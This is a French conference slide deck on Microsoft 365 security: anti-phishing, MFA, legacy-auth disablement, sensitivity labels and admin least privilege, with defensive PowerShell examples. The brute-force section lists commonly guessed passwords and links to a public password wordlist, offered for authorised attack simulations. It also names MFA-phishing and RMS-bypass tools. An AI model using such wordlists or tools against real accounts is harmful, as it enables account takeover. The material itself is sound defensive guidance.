SlideShare une entreprise Scribd logo
1  sur  177
Télécharger pour lire hors ligne
Guillaume Mathieu
Sébastien Paulet
Microsoft MVPs
Cybersécurité et
M365 en action
MODERN WORKPLACE
CONFERENCE PARIS 2019
MWCP 2019 - Thanks to our
Sponsors!
3
Enterprise Solutions
Architect
SPT Conseil
@SP_twit
Blog
sppublish.wordpress.com
Directeur Technique
Flexsi
Blog
http://msreport.free.fr
Guillaume Mathieu & @SP_twit #MWCP19
4
Introduction
Microsoft 365
Windows Office 365 EM+S
S Guillaume Mathieu & @SP_twit #MWCP19
Office 365
S
Groups
Teams Yammer
OneDrive
SHAREPOINT EXCHANGE
Planner
Guillaume Mathieu & @SP_twit #MWCP19
S
Power Plateform
Power BI Power Apps Power Automate
Office Pro Plus
Word PowerPoint Excel Notes
Office 365 (suite)
Autres
Forms Stream
Guillaume Mathieu & @SP_twit #MWCP19
Enterprise Mobility + Security
G Guillaume Mathieu & @SP_twit #MWCP19
• Azure Active Directory Premium
• Azure MFA
• Azure Advanced Protection
• Microsoft Cloud App Security
• Azure Information Protection Premium
• Azure Right Management Premium
• Intune
@AaronDinnage
S
@AaronDinnage
S
@AaronDinnage
G
O365 repose sur Azure
S Guillaume Mathieu & @SP_twit #MWCP19
Office 365 (SaaS)
Azure (IaaS)
Gestion de l’identité – Azure Active Directory
S Guillaume Mathieu & @SP_twit #MWCP19
Sécurité (Etats-Unis)
G Guillaume Mathieu & @SP_twit #MWCP19
Sécurité (France)
G Guillaume Mathieu & @SP_twit #MWCP19
280 jours : délais pour détecter une attaque
63 jours : délais pour s’en remettre
20 minutes (NotPetya) : 2000 machines, 100 serveurs, sauvegardes HS
81 % : les entreprises Françaises ciblées par une attaque informatique (probablement plus).
35 % : source de l’incident de sécurité, l’équipe IT
800000 euros : prix (moyenne) pour s’en remettre
Au programme aujourd’hui
G Guillaume Mathieu & @SP_twit #MWCP19
• Arnaque au président
• Attaque brute force
• Contournement du MFA
• Fuite de données
• Abus de privilèges
• Vol/perte de terminal
• Cryptolocker
• Suivi
• Et Microsoft?
18
Incident #1
Arnaque aux présidents
(phishing)
Simuler une attaque avec Office 365 Attack Simulator
G Guillaume Mathieu & @SP_twit #MWCP19
Le cocktail SPF, DMARC, DKIM
• SPF -> Origine
• vérification IP/domaine envoie du mail (déclaration DNS)
• Configuré par défaut si 100% Online
v=spf1 include:spf.protection.outlook.com -all
• Admin centrale tenant > Configurer > Domaine
• Voir https://docs.microsoft.com/fr-fr/microsoft-365/security/office-365-
security/set-up-spf-in-office-365-to-help-prevent-spoofing
Guillaume Mathieu & @SP_twit #MWCP19S
Le cocktail SPF, DMARC, DKIM
• DKIM -> Intégrité
• signature du mail (clé publique dans le DNS du domaine)
Déclarer les CNAME dans Admin tenant >
Configurer > Domaines
avec pour les noms d’hôte (Ajout CNAME)
selector1._domainkey
selector2._domainkey
Guillaume Mathieu & @SP_twit #MWCP19
#Depuis le Microsoft Exchange Online Powershell module
PS > Connect-EXOPSSession #Connexion Exchange Online Pshell Module
PS > Get-DkimSigningConfig -Identity <custom domain> | fl Selector1CNAME,
Selector2CNAME
PS > Set-DkimSigningConfig -Identity
<custom domain> -Enabled $true
S
Le cocktail SPF, DMARC, DKIM
• DMARC -> Vérification du « Friendly-from » ie MailFrom(5321) = From(5322)
• définition du comportement en cas d’échec SPF et DKIM
• Déjà géré sur les mails entrants
• Pour les mails sortants, modification du DNS (Ajout « TXT »):
• Rien faire: _dmarc.<domaine> 3600 IN TXT "v=DMARC1;
p=none"
• Mise en quarantaine : _dmarc.<domaine> 3600 IN TXT
"v=DMARC1; p=quarantine"
• Rejet : _dmarc.<domaine> 3600 IN TXT "v=DMARC1;
p=reject"
S
Exchange Online Protection (EOP)
• Fonctionnalité inclue dans O365. Add-on pour Exchange On-Premise
• Mails entrants:
• Filtre
• Antivirus
• Policies check
• Anti Spam
• Si ATP, ATP
• Delivery
S Guillaume Mathieu & @SP_twit #MWCP19
Exchange Online Protection (EOP)
• Mails sortants:
• Antivirus
• Policies check
• Anti Spam
• Score
• Delivery
S Guillaume Mathieu & @SP_twit #MWCP19
Office 365 ATP – Safe Links
G Guillaume Mathieu & @SP_twit #MWCP19
Office 365 ATP – Safe Links
G Guillaume Mathieu & @SP_twit #MWCP19
• Retour d’expérience
• Réécriture d’URL → attention aux
campagnes marketing de la société !
https://fra01.safelinks.protection.outlook.com/?url=https
%3A%2F%2Fleblogosd.wuibaille.fr%2F&data=02%7C01%7
Cmelanie.mathieu%40flexi.msreport.fr%7C7faf54252d0f4
d687ded08d77b04f4b0%7C2e609e7429a14af3b552f9ee8
23c868a%7C1%7C0%7C637113133514350121&sdata=ne
XyaMJSEbmWlgB7NaBnyYDspzHJcfnqPg7ezB1h%2B08%3
D&reserved=0
• Possibilité d’interdire URL / autoriser des
URL sans inspection
• Astuce : faire un clic droit puis Copy link
address dans le navigateur
• A activer progressivement.
SafeLinks dans Teams
S Guillaume Mathieu & @SP_twit #MWCP19
Anti phishing avec Office 365 ATP
• Protection contre l’usurpation de domaine ou mails en particulier
• Définition de stratégies Centre de sécurité > Gestion des menaces >
Stratégie
• Protection d’adresse usurpables (max 60)
• Possibilité d’activer du ML (boite intelligente) pour améliorer le
filtrage
Guillaume Mathieu & @SP_twit #MWCP19S
Anti phishing avec Office 365 ATP
• Retour d’expérience :
• 30 minutes pour s’appliquer
• On indique les boîtes aux
lettres sensibles dont
l'identité peut être usurpée.
On ne sélectionne pas les
BAL qui doivent être
protégées !
• Les boîtes aux lettres
sensibles peuvent être
internes ou externes.
Guillaume Mathieu & @SP_twit #MWCP19G
Office 365 ATP – Safe attachments
G Guillaume Mathieu & @SP_twit #MWCP19
Audit de config ATP avec ORCA
• Office 365 Advanced Threat Protection Recommended Configuration
Analyzer (ORCA) – Recommandation des devs et experts MS
• Voir aussi
https://docs.microsoft.com/
en-us/microsoft-365/security/
office-365-security/
recommended-settings-for-eop-
and-office365-atp
Guillaume Mathieu & @SP_twit #MWCP19
PS > Install-Module -Name ORCA #Dans Pshell avec admin rights
PS > Get-ORCAReport #Dans Exchange Online Powershell Module
S
En résumé
• Sans EMS :
• SFP, DKIM, DMARC
• Filtrage par défaut avec EOP
• Possibilité de définir des strategies
• Avec EMS
• Safe Links
• Safe Attachments
• Protection domaines et BAL avec ATP
Guillaume Mathieu & @SP_twit #MWCP19
34
Incident #2
Attaque brute force
Attaquer un mot de passe
• Password spray
• Brute force
• Achat de base utilisateurs (62% des utilisateurs réutilisent)
• Phishing
• Keylog
• Mdp écrits
• Extorsion
S Guillaume Mathieu & @SP_twit #MWCP19
Simuler une attaque Spray/Brute Force (O365 E5)
• Here are the top 10 we are seeing in guessing attacks on our system:
• 123456
• password
• 000000
• 1qaz2wsx
• a123456
• abc123
• abcd1234
• 1234qwer
• qwe123
• 123qwe
S Guillaume Mathieu & @SP_twit #MWCP19
Simuler une attaque Spray/Brute Force (O365 E5)
• Retours d’expériences :
• Fichier avec 10 millions de mot de passe : 8,13 Mo
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/C
ommon-Credentials/10-million-password-list-top-1000000.txt
• La cible doit avoir une boîte aux lettres Office 365
• Hard Return entre les lignes (pas de SHIFT + entrée)
• Taille du fichier avec les mots de passe : 10 Mo
En pratique, fonctionne uniquement avec un petit nombre de mots de passe.
• Lent
• Documentation : https://docs.microsoft.com/en-us/microsoft-
365/security/office-365-security/attack-simulator#brute-force-password-attack
Guillaume Mathieu & @SP_twit #MWCP19SG
Le SSPR (Self Service Password Reset)
• Utilisateur In Cloud :
• Changement du mot de passe
Azure AD uniquement.
• Licence Office 365 ou Azure
Free.
• Changement du mot de passe
via My Account
https://account.activedirectory
.windowsazure.com/ChangePa
ssword.aspx
S Guillaume Mathieu & @SP_twit #MWCP19G
Le SSPR (Self Service Password Reset)
• Utilisateur synchronisé :
• Licence Azure AD Premium P1 requise
• Définir son profil SSPR : http://aka.ms/ssprsetup
• Réinitialisation du mot de passe : http://aka.ms/sspr ou My Account
(https://account.activedirectory.windowsazure.com/ChangePassword.aspx)
• Durée de vie minimale du mot de passe AD : 0 jour
S Guillaume Mathieu & @SP_twit #MWCP19G
Le SSPR (Self Service Password Reset)
• Utilisateur synchronisé (suite) :
• Azure AD Connect configuré pour le Write Back des mots de passe.
• Stratégie de mot de passe AD = stratégie de mot de passe Azure AD
• Stratégie de mots de passe Azure AD → ignoré pour un compte synchronisé
Option à activer au niveau du Tenant Azure AD :
Set-ADSyncAADCompanyFeature -ForcePasswordResetOnLogonFeature $True
-ConnectorName msreportacademy.onmicrosoft.com -AAD
• Option Azure AD Connect : activer synchroniser « Password must be changed
at next logon »
Set-MsolDirSyncFeature -Feature
EnforceCloudPasswordPolicyForPasswordSyncedUsers
S Guillaume Mathieu & @SP_twit #MWCP19G
Azure AD Password Protection
S Guillaume Mathieu & @SP_twit #MWCP19G
Azure AD Password Protection
• Déploiement
• https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-
password-ban-bad-on-premises-deploy
• Agent à déployer sur tous les contrôleurs de domaine (Passfit.dll)
• Les DC n’ont pas besoin d’avoir un accès Internet.
• Retours d’expériences :
• Licences Azure AD Premium P1, P2 sauf pour les comptes Cloud Only sans liste de
mot de passe interdit.
• Maximum 1000 mots de passe interdits personnalisés. L’outil prend en charge les
variantes de mots de passe.
• Liste de mots de passe interdits = liste globale générée via Azure AD Identity
Protection + liste personnalisée.
• Incompatible avec l’agent Azure AD Application Proxy.
S Guillaume Mathieu & @SP_twit #MWCP19G
Azure AD Password Protection
S Guillaume Mathieu & @SP_twit #MWCP19G
Preview : l’utilisateur vérifie lui-même ses données de connexion
Guillaume Mathieu & @SP_twit #MWCP19
Via le portail : https://mysignins.microsoft.com ou https://myprofile.microsoft.com/
S
Preview : l’utilisateur vérifie lui-même ses données de connexion
Guillaume Mathieu & @SP_twit #MWCP19
Via le portail Azure AD (https://portal.azure.com) dans le contexte d’un compte standard
S
AD Smart Lock / IP Smart Lock
• Si AD : Fonctionne uniquement si les Hash sont synchronisés dans le Cloud
• Par défaut: verrouillage de 60 secondes après 10 tentatives KO
• Activation par https://aad.portal.azure.com/ > Sécurité
S Guillaume Mathieu & @SP_twit #MWCP19
AD Smart Lock / IP Smart Lock
• Retours d’expériences :
• Même problématique que le verrouillage des comptes AD.
• Peut être détourné pour faire une attaque de type dénie de service si les
seuils de verrouillage de comptes sont trop bas ou si la durée de verrouillage
est trop importante.
Guillaume Mathieu & @SP_twit #MWCP19G
MFA « simple »
• Inclus avec Office 365
• Configurer le cache de
session / méthode
d’authentification.
• Conditionnal Access avec
ADFS : Skip multi-factor
authentication for
requests from federated
Users
• Garder un compte
admin sans MFA (Glass
breaker) avec mot de
passe aléatoire de 20
caractères minimum.
S Guillaume Mathieu & @SP_twit #MWCP19G
#General : PowerShell sur Microsoft 365
Guillaume Mathieu & @SP_twit #MWCP19
#Ajout de la PowerSehll Gallery en zone de confiance
PS > Set-PSRepository -Name PSGallery -InstallationPolicy Trusted
PS > Install-Module MSOnline #O365
PS > Install-Module AzureAD –Repository PSGallery #Azure AD
PS > Install-Module Microsoft.Online.SharePoint.PowerShell #SharePoint
PS > Install-Module MicrosoftTeams #Teams
S
• Retour d’expériences :
• 1 module PowerShell pour tous les services Office 365.
• 2 modules PowerShell pour Azure : MsOnline et AzureAD.
Les 2 sont complémentaires.
• Nouveau module PowerShell pour Exchange (pour authentification moderne /
MFA).
G
#General : Powershell sur Microsoft 365
• Installer le module PowerShell Exchange Online V1 (solution 1) :
• Utiliser le lien depuis Exchange Online Admin Center | hybrid.
Utiliser Internet Explorer comme navigateur pour le téléchargement !
Guillaume Mathieu & @SP_twit #MWCP19
PS > Connect-EXOPSSession
#Connexion Exchange Online
PS > Connect-IPPSSession
#Connexion centre de Sécurité
et Conformité
S
#General : PowerShell sur Microsoft 365
• Installer le module Exchange Online V2 (solution 2) :
• Suivre la procédure Microsoft :
https://docs.microsoft.com/en-us/powershell/exchange/exchange-
online/exchange-online-powershell-v2/exchange-online-powershell-
v2?view=exchange-ps
Fermer PowerShell après installation forcée de PowerShellGet.
Guillaume Mathieu & @SP_twit #MWCP19
PS > Install-Module PowershellGet -Force #Installation POwerShell Get
PS > Set-ExecutionPolicy RemoteSigned
PS > Install-Module -Name ExchangeOnlineManagement #Installation du module
Exchange V2
PS > Connect-ExchangeOnline #Connexion Exchange Online
S
Activation ADAL
• Activé par défaut uniquement sur les tenants récents.
• Prérequis pour le MFA avec les clients lourd (Outlook, Word, Excel…)
• Plus besoin de ressaisir le mot de passe dans Outlook en mode fédéré
(ADFS…).
• Prérequis pour désactiver les anciens (Legacy) protocoles d’authentification
Exchange Online.
Guillaume Mathieu & @SP_twit #MWCP19S
PS > Connect-EXOPSSession #Exchange Online Powershell module
PS > Set-OrganizationConfig -OAuth2ClientProfileEnabled $true #30 minutes
to apply
PS > Get-OrganizationConfig | Format-Table Name,OAuth* -Auto
#Vérification
Désactivation des protocoles « Legacy »
S Guillaume Mathieu & @SP_twit #MWCP19
Microsoft désactivera les
protocoles d’authentification
basiques (sauf SMTP) dés
Octobre 2020
Protocol / service Paramètre (pour les Policies)
Exchange Active Sync (EAS) AllowBasicAuthActiveSync
Autodiscover AllowBasicAuthAutodiscover
IMAP4 AllowBasicAuthImap
MAPI over HTTP (MAPI/HTTP) AllowBasicAuthMapi
Offline Address Book (OAB) AllowBasicAuthOfflineAddressBook
Outlook Service AllowBasicAuthOutlookService
POP3 AllowBasicAuthPop
Reporting Web Services AllowBasicAuthReportingWebServices
Outlook Anywhere (RPC over HTTP) AllowBasicAuthRpc
Authenticated SMTP AllowBasicAuthSmtp
Exchange Web Services (EWS) AllowBasicAuthWebServices
PowerShell AllowBasicAuthPowerShell
Désactivation des protocoles « Legacy »
S Guillaume Mathieu & @SP_twit #MWCP19
• Désactivation avec PowerShell :
PS > Connect-EXOPSSession #Connexion
Exchange Online Pshell Module
PS > Set-CASMailbox -Identity
mwcpdemo01@contoso.com -ImapEnabled
$false -PopEnabled $false -
ActiveSyncEnabled $false
Désactivation des protocoles « legacy »
S
Guillaume Mathieu & @SP_twit #MWCP19
• Désactivation par stratégie
PS > New-AuthenticationPolicy –Name "Strict no basic auth" #enable ADAL before!
PS > New-AuthenticationPolicy -Name "Allow Outlook Desktop" -AllowBasicAuthImap -
AllowBasicAuthWebServices #if I need to run Outlook without Modern Auth
PS > Set-User -Identity mwcpdemo01@contoso.com -AuthenticationPolicy "Strict no basic
auth“ #Apply at user level (for test and exceptions)
PS > Set-User -Identity mwcpdemo01@contoso.com -STSRefreshTokensValidFrom
$([System.DateTime]::UtcNow) #force to apply policy under 30 minutes (/24 hours)
PS > Set-User -Identity mwcpdemo01@contoso.com -AuthenticationPolicy $null #Clear
user policy
PS > Set-OrganizationConfig -DefaultAuthenticationPolicy "Strict no basic auth"
#Apply at org level
Désactivation des protocoles « legacy »
S Guillaume Mathieu & @SP_twit #MWCP19
• Désactivation par accès conditionnel :
• Nécessite Aure AD Premium P1
Désactivation des protocoles « legacy »
S Guillaume Mathieu & @SP_twit #MWCP19
• Désactivation par stratégie d’accès conditionnel :
• Nécessite Aure AD Premium P1
• Azure AD > Accès conditionnel > Stratégie > Baseline policy: End User protection
• S’applique à tout le Tenant -> pour les environnements complexes, utiliser une
stratégie personnalisée !
Activation des logs Exchange Online
• Activé par défaut
• Nécessite O365 E5 pour voir l’audit depuis le centre de sécurité et
conformité https://protection.office.com/unifiedauditlog
S Guillaume Mathieu & @SP_twit #MWCP19
PS > Connect-EXOPSSession #Exchange Online Powershell module
PS > Get-OrganizationConfig | Format-List AuditDisabled #False is OK
Activation des logs O365
• Désactivé par défaut
• Centre Sécurité et Conformité
> Rechercher > Rechercher
dans le journal d’audit
• Conservation 90 jours
• Extension à 365 jours
à venir 12/2019 pour
comptes E5 (#56794)
S Guillaume Mathieu & @SP_twit #MWCP19
PS > Connect-EXOPSSession #Exchange Online Powershell module
PS > Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $true
MFA selon règle d’accès conditionnel
• Réduire le nombre de demandes MFA.
• Licences Azure AD Premium P1 ou Azure AD Premium P2 (pour Sign Risk)
• Assignations à des utilisateurs, groupes, rôles (Preview)
• Définition de conditions et de règles d’accès.
G
MFA selon règle d’accès conditionnel
• Retours d’expérience :
• Désactiver le MFA pour tous les utilisateurs au niveau d’Azure MFA → conflit
avec les règles d’accès conditionnels dans le cas contraire.
Attack Simulator : créer un compte dédié pour cette action car Azure MFA doit
être activé !
• Condition Sign Risks → s’appuie sur Azure AD Identity Protection.
• Impacts potentiels si utilisation des règles par défaut (pas de ciblage).
• Scénarios à privilégier / implémenter :
• MFA uniquement pour les machines non gérées (licence Azure AD P1)
Nécessite de configurer les machines Windows en mode Hybride Join.
• MFA sur détection de risques (licences Azure AD P2)
G Guillaume Mathieu & @SP_twit #MWCP19
MFA pour les machines non gérées
• Les types de périphériques Azure AD :
• Azure registred (workplace join)
• Azure AD Join : machine jointe à Azure Active Directory
• AD Domain Join : machine jointe à un domaine Active Directory
• Hybrid Join : machine jointe à un domaine Active Directory avec synchronisation du compte
ordinateur sous forme d’un MSolDevice.
Nécessite une configuration spécifique d’Azure AD Connect.
G
MFA pour les machines non gérées
G
• Configuration de la machine :
• Une machine ne
peut pas être à la
fois Azure AD
Domain Join et AD
join !
MFA pour les machines non gérées
G
• Spécificités machines Azure AD Join :
• Pour des donner des
permissions à un compte
Azure AD :
• Impossible via l’interface
graphique
• Nécessite ICACLS :
icacls "C:yourpath" /t
/grant azureadFirstLast:M
MFA pour les machines non gérées
G
• Configuration Hybride Join via Azure AD Connect
MFA en cas de détection de risque
• Retour d’expériences :
• Licences Azure AD Premium P2 requise.
• S’appuie sur Azure AD Identity Protection.
• Simulation : utilisation de Tor Browser avec le compte
melanie.bertrand@flexi.msreport.fr
G
Azure AD comme IDP
• Objectifs
• Provisionner automatiquement les applications SaaS.
• Réduire le nombre de login / mot de passe. Azure AD va jouer le rôle d’IDP
(comme ADFS, Ping Federate).
• Quelques définitions :
• IdP : Identity Provider (l’Azure AD IDP)
• SP : Service Provider (le service pour lequel l’utilisateur veut se connecter)
• SCIM (System for Cross Domain Identity Management) : permet de créer, modifier
et supprimer les identités des applications SaaS.
• SAML (Security assertion markup language) : protocole de fédération d’identité
G
Azure AD comme IDP : exemple avec ServiceNow
G
En résumé
• Activer la librairie ADAL pour Exchange Online / SharePoint Online et bloquer
les anciens protocoles (POP, IMAP…)
• Sans EMS
• Mots de passe complexes et MFA (accès conditionnel basique si ADFS).
• Analyse de logs Exchange et O365
• Réduire le nombre de logins / mots de passe (Azure AD comme IDP).
Maximum 10 applications au niveau du Tenant Azure AD / Office 365
• Avec EMS
• SSPR
• MFA selon emplacement géographique, applications, risques, machine
gérée ou non.
• Liste personnalisée de mots de passe interdits.
• Azure Identity protection protège contre les attaques.
• Réduire le nombre de logins / mots de passe (Azure AD comme IDP)
Pas de limite dans le nombre d’applications.
Guillaume Mathieu & @SP_twit #MWCP19
70
Incident #3
Contournement du
MFA
Channel jacking
S Guillaume Mathieu & @SP_twit #MWCP19
Demandez lui …
S Guillaume Mathieu & @SP_twit #MWCP19
Jack Dorsey, CEO Twitter. Piraté par SIM SWAP en Aout 2019
L’attaque Man In The Middle sur MFA
S Guillaume Mathieu & @SP_twit #MWCP19
Utilisateur
4
2FA
Exemple de MITM MFA : EvilGinx
S Guillaume Mathieu & @SP_twit #MWCP19
Filtrer les pays
Guillaume Mathieu & @SP_twit #MWCP19S
Le PasswordLess
G
• Quelques protocoles à connaître :
• OATH (Initiative for Open Authentication) : groupe de collaboration
international qui vise à promouvoir l’authentification forte en open-
source.
• OTP : One Time Password
• TOTP : Time based One Time Password
Google Authenticator et Microsoft Authenticatior utilisent le protocole
TOTP
• FIDO 2 (Fast Identity Online) :
Basé sur les protocoles Client to Authenticator Protocol (CTAP) et W3C
WebAuthn.
PasswordLess avec Authenticator (preview)
• Activation dans Azure AD
S Guillaume Mathieu & @SP_twit #MWCP19
PasswordLess avec Authenticator
• Coté utilisateur, aller sur https://aka.ms/mysecurityinfo pour
paramétrer Authenticator (nécessite l’enregistrement du téléphone)
• Ne résout pas les attaques MitM
S Guillaume Mathieu & @SP_twit #MWCP19
Démo : PasswordLess clés FIDO2 (Yubikey)
Guillaume Mathieu & @SP_twit #MWCP19G
Authentification par SMS
• Pour les « ForstLine Workers », possibilité d’authentification sans mot
de passe, directement par envoie de SMS
S Guillaume Mathieu & @SP_twit #MWCP19
En résumé
• MFA n’est pas 100% sûr
• Tenir les antivirus à jour pour éviter les movement latéraux
• Avec EMS
• Bloquer le phishing initial avec Office 365 ATP
• Filtrer les pays si possible
• Passwordless en 2020
Guillaume Mathieu & @SP_twit #MWCP19
84
Incident #4
Fuite de données
(utilisateur ou vol)
La menace intérieure
Source : Haystax Insider threat report 2019
S Guillaume Mathieu & @SP_twit #MWCP19
La menace intérieure
S Guillaume Mathieu & @SP_twit #MWCP19
Source : Haystax Insider threat report 2019
Protection des données / RMS
• IRM sur O365 (à partir de licence E3)
• Faire porter les permissions définies au
niveau de SharePoint sur le document.
• Système de clef publique/clef privé et
un chiffrement des documents à la
volée (clés publiques RSA 2048 bits, et
SHA-256 pour les signtaures)
• Lire https://docs.microsoft.com/fr-fr/information-protection/understand-explore/how-does-it-work
• Système cassable dés lors qu’on a les droits en View Only https://github.com/RUB-NDS/MS-RMS-Attacks
S Guillaume Mathieu & @SP_twit #MWCP19
Protection des données / RMS
S Guillaume Mathieu & @SP_twit #MWCP19
Etiquettes de confidentialités
• Office 365 E3 requis
• Disponible in Outlook, SharePoint, OWA and O365 Pro Plus clients
@SP_twit #aOSKL
Etiquettes de confidentialités - Effets
• Chiffrement des fichiers
-> Impossible à ouvrir pour les utilisateurs non autorisés
/ non authentifiés
• Restriction des permissions
-> Désactivation du copier-coller, impression, capture
d’écran, transfert de mails , etc.
• Watermarking
-> sur les fichiers Word
• Bloquage de la copie sur clef USB / PJ sur services non O365
-> RequiereWIP (Windows Information Protection) et
Intune
@SP_twit #aOSKL
Création d’étiquettes de confidentialité
• En tant qu’admin de tenant, section
« Sécurité et conformité »
• Dans le centre de sécurité et conformité,
aller dans « Classification » >
« Etiquettes de confidentialité »
• Cliquer sur « Créer une étiquette »
@SP_twit #aOSKL
Publication d’étiquettes de confidentialité
• Dans le centre de sécurité et conformité, aller dans « Classification »
> « Etiquettes de confidentialité »
• Cliquer sur « Stratégie des étiquettes»
@SP_twit #aOSKL
Nouveauté à venir sur les Labels
• Etiquettes disponibles dans tous les clients (Web ou Pro Plus)
• Support des fonctionnalités Search, OWA, co-édition et eDiscovery
pour les documents chiffrés
• Association d’étiquette de confidentialité aux
Teams/GroupeO365/Sites
• Support des PDF protégés
dans Edge
S Guillaume Mathieu & @SP_twit #MWCP19
Application automatique d’étiquettes avec les DLP
• Office 365 E5 requis
• Data Loss Prevention
• Basé sur des expressions régulières
(RegEx) ou dictionnaires
• Peut aussi provoquer des
avertissements ou des blocages de
fichiers
• Compter 7 jours après publication
pour l’application automatique
S Guillaume Mathieu & @SP_twit #MWCP19
Application automatique d’étiquettes avec les DLP
• Intune requis
• Bloque la copie sur
périphériques non
autorisés et envoi vers
services non reconnus
• Config:
• Créer/publier les étiquettes
• Config Microsoft Defender
ATP
• Créer une stratégie WIP
avec Intune ou SCCM
S Guillaume Mathieu & @SP_twit #MWCP19
Label Auto Apply
• Détection désormais en temps réel lors de la saisie dans Office Pro
Plus
• Application du label ou recommandation d’appliquer
S Guillaume Mathieu & @SP_twit #MWCP19
Trainable classifiers
• Application des étiquettes par Machine Learning
• Utilisation des critères existants ou création de critères propres
(50 à 500 contenus pour apprendre et 10.000 pour les tests).
S Guillaume Mathieu & @SP_twit #MWCP19
Insider Risk Management
• Détection des comportements anormaux dans la durée des
utilisateurs
• API Graph + Playbooks configurables + Machine Learning
S Guillaume Mathieu & @SP_twit #MWCP19
Gestion des extérieurs
• Activable /OneDrive / SiteCollections /Teams
• Possibilité de restreindre à des domaines
• Possibilité de MFA pour les extérieurs (attribution de licences Azure
AD Premium P1 + Azure MFA) via Azure AD ou Conditional Access.
(Non testé avec OTP?)
S Guillaume Mathieu & @SP_twit #MWCP19
Utilisateurs extérieurs – Liens anonymes
• A désactiver !
• Gestion globale via Central Admin SharePoint > Stratégies > Partage
S Guillaume Mathieu & @SP_twit #MWCP19
Utilisateurs extérieurs – Liens anonymes
• Gestion des SharePoint (et Teams) depuis la central admin SharePoint
> Sites > Sites Actifs > <site> > partage externe
S Guillaume Mathieu & @SP_twit #MWCP19
Utilisateurs extérieurs – Liens anonymes
• Gestion des OneDrive depuis la central admin du tenant > Utilisateurs
> Utilisateurs Actifs > <user> > Gérer le partage externe
S Guillaume Mathieu & @SP_twit #MWCP19
Obtenir les IP des accès anonymes
Script de Tony Redmond sur https://www.petri.com/tracking-
anonymous-access-sharepoint-onedrive-documents
S Guillaume Mathieu & @SP_twit #MWCP19
Annonces pour la gestion des extérieurs
• Bloquer le partage en lien anonymes des fichiers sensibles
• Bloquer le téléchargement des fichiers dans les liens anonymes pour
tous les formats supportés par OWA
• Limiter dans le temps les accès aux
utilisateurs externes authentifiés
S Guillaume Mathieu & @SP_twit #MWCP19
Désactivation du transfert automatique de mails
• Dans Exchange Online Powershell Module
G Guillaume Mathieu & @SP_twit #MWCP19
<# Efface les forward existants #>
PS > $AllForwards = Get-Mailbox -ResultSize Unlimited -Filter
{(RecipientTypeDetails -ne "DiscoveryMailbox") -and
((ForwardingSmtpAddress -ne $null) -or (ForwardingAddress -ne $null))} |
Select Identity
PS > $AllForwards | % {Set-Mailbox -Identity $_.Identity -
ForwardingSmtpAddress $null -ForwardingAddress $null}
<# Desactive la possibilité de créer des forwards #>
PS > Set-RemoteDomain Default -AutoForwardEnabled $false
Le CASB avec Cloud App Security
• Licence EMS E5 requise
• Permet l’analyse des logs pare feu / proxy pour détecter les
applications SaaS non autorisées.
• Portail : https://portal.cloudappsecurity.com/
Guillaume Mathieu & @SP_twit #MWCP19S
MIM 2016
• MIM 2016 est une suite de produits :
• MIM Synchronisation Service : moteur de synchronisation avec de nombreux
connecteurs
• MIM portal + MIM Services + MIMWALL : moteur de workflow, portail web
• BHOLD : remplacé par Azure AD Access Review
• MIM 2016 Certificate Management : gestion des certificats
• PAM : gestion des comptes à fort privilèges
• Azure AD Connect est une version dérivée de MIM Service et MIM
Synchronisation Service
• MIM Synchronization Service ne nécessite pas l’achat de licences !
https://social.technet.microsoft.com/wiki/contents/articles/2487.ho
w-to-license-fim-2010-and-mim-2016.aspx
G Guillaume Mathieu & @SP_twit #MWCP19
MIM 2016
G
Management Agent : connecteur MIM Synchronization Service (AD, SQL, fichier texte, LDAP…).
Connecteur space : copie en lecture seule du contenu d’un connecteur (AD, SQL…).
Import : le contenu du système cible est copié dans le connecteur space.
Export : le contenu du connecteur space est copié dans le système cible.
MIM 2016
• Les actions effectuées lors d’une FULL Synchronization :
• Filter/Delete : les objets filtrés sont chargés dans le connecteur space du Management
Agent (pas dans la Metaverse).
• Join : permet d’associer un objet du connecteur space avec un objet de la Metaverse selon
une règle de jointure.
Exemple : ExtensionAttribute1 du connecteur space AD = EmployeeID de la Metaverse)
• Projection : création d’une entrée dans la Metaverse à partir d’un objet d’un connecteur
space.
• Provision : création d’une entrée dans un connecteur space à partir d’un objet de la
Metaverse.
Cette opération nécessite l’écriture d’une Metaverse Rule.
Cette dernière est une DLL qui doit être écrite en VBNET ou en C#.
• Import Attributes Flow (IAF) : application des règles de synchronisation connecteur space
Metaverse.
Les règles de transformation complexes nécessitent le développement d’une Rule Extension.
Cette dernière est une DLL écrite en VBNET ou en C#.
• Export Attributes Flow (EAF) : application des règles de synchronisation connecteur space
Metaverse.
Les règles de transformation complexes nécessitent le développement d’une Rule Extension.
Cette dernière est une DLL écrite en VBNET ou en C#.
G
Azure AD Access Package
• Permet de créer des groupements de ressources.
• Les utilisateurs demandent l’accès aux Access Package avec / sans
approbation.
• Portail de demande : https://myaccess.microsoft.com
• Licences Azure AD Premium P2 requis.
G Guillaume Mathieu & @SP_twit #MWCP19
Azure AD Access Review
• Permet de certifier les accès des utilisateurs.
• Licences Azure AD Premium P2 requis.
G Guillaume Mathieu & @SP_twit #MWCP19
En résumé
• Sans EMS :
• Utiliser les étiquettes de confidentialités et faites les utiliser (peut nécessiter EMS)
• Gérer finement les utilisateurs externes
• Désactiver les forward de mails
• Créer, modifier, supprimer les identités et les comptes utilisateurs associés avec
MIM 2016Synchronization Service (licence Windows Server requise).
• Avec EMS :
• Utiliser Microsoft Cloud App Security pour détecter le Shadow IT (applications
SaaS non autorisées).
• Créer, modifier, supprimer les identités et les comptes utilisateurs associés avec
MIM 2016 (avec le portail MIM).
• Certifier les accès de vos utilisateurs avec Azure AD Access Review.
• Gérer l’accès à vos ressources avec Azure AD Access Package.
• Insider Risk Management à venir
Guillaume Mathieu & @SP_twit #MWCP19G
113
Incident #5
Fuite de la part des
admins
Cet homme était admin SharePoint
S Guillaume Mathieu & @SP_twit #MWCP19
La menace IT
S Guillaume Mathieu & @SP_twit #MWCP19
Source : Haystax Insider threat report 2019
POLP – Principe de moindre privilèges appliqué à
l’admin M365
Meilleures sécurité (Snowden n’avait besoin que de faire
des backups)
Minimisation de la surface d’attaques extérieures
Limitation de la propagation des virus
Guillaume Mathieu & @SP_twit #MWCP19S
Recommandations générales
Guillaume Mathieu & @SP_twit #MWCP19
• Comptes administration nominatifs.
• De 2 à 4 comptes d’admin généraux MAX
• Compte(s) brise-glace (20+ chars mdp, renouvellement de MDP
après usage et sur base périodique).
• Machines dédiées pour utiliser les comptes admin
• MFA/Passwordless obligatoire
• Délégation de droits selon le principe du moindre privilège.
